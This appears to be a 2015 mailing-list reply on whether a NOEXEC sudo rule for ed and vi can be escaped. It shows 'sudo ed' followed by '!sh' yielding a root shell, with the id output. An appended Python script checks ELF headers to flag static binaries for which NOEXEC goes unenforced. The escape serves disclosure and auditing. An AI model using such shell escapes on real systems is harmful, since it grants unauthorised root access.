On 2015-04-27, "whynot sudo" <whynots...@safe-mail.net> wrote:

> Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi
> foouser LOCALHOST = NOPASSWD: NOEXEC: FOO
>
> Can the "foouser" escape to root prompt?

Let's try!

$ sudo ed
!sh 
# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# 

Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with
static executables.

-- 
Christian "naddy" Weisgerber                          na...@mips.inka.de
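
An audit check for the gap described above, added here as an example and not part of the original post or of sudo: it flags commands in a NOEXEC-tagged Cmnd_Alias whose ELF image has no PT_INTERP segment, meaning no dynamic loader runs to honour LD_PRELOAD. The function names, `make_elf` and the sample images are constructed for illustration, and which binary is static in the sample is an assumption.

```python
import struct

PT_LOAD, PT_INTERP = 1, 3  # PT_INTERP names the dynamic loader (ld.so)

def has_interp(elf: bytes) -> bool:
    """True if the ELF image requests a dynamic loader via PT_INTERP."""
    if len(elf) < 16 or elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = elf[4] == 2                   # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if elf[5] == 1 else ">"    # EI_DATA: 1 = little endian
    if is64:
        e_phoff, = struct.unpack_from(end + "Q", elf, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 0x36)
    else:
        e_phoff, = struct.unpack_from(end + "I", elf, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 0x2A)
    for i in range(e_phnum):
        # p_type is the first 32-bit field of every program header
        p_type, = struct.unpack_from(end + "I", elf, e_phoff + i * e_phentsize)
        if p_type == PT_INTERP:
            return True
    return False

def noexec_unenforced(cmnd_alias: str, images: dict) -> list:
    """Paths in a Cmnd_Alias whose image is static, so a preload shim never loads."""
    paths = [p.strip() for p in cmnd_alias.split("=", 1)[1].split(",")]
    # Paths with no image supplied are skipped; on a real host read them from disk.
    return [p for p in paths if p in images and not has_interp(images[p])]

def make_elf(p_types):
    """Constructed sample: minimal 64-bit little-endian ELF with these segments."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)
    hdr = ident + struct.pack("<HHIQQQIHHHHHH",
                              2, 62, 1, 0, 64, 0, 0, 64, 56, len(p_types), 0, 0, 0)
    return hdr + b"".join(struct.pack("<I", t) + bytes(52) for t in p_types)

ALIAS = "Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi"  # line from the post
SAMPLE = {  # constructed images, not real binaries; the static/dynamic split is assumed
    "/bin/ed": make_elf([PT_LOAD]),
    "/usr/bin/vi": make_elf([PT_LOAD, PT_INTERP]),
}

if __name__ == "__main__":
    for path in noexec_unenforced(ALIAS, SAMPLE):
        print(f"{path}: static, NOEXEC preload shim will not apply")
```

The check covers only the static-linking gap; a binary that passes it is not thereby safe to grant through sudo.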
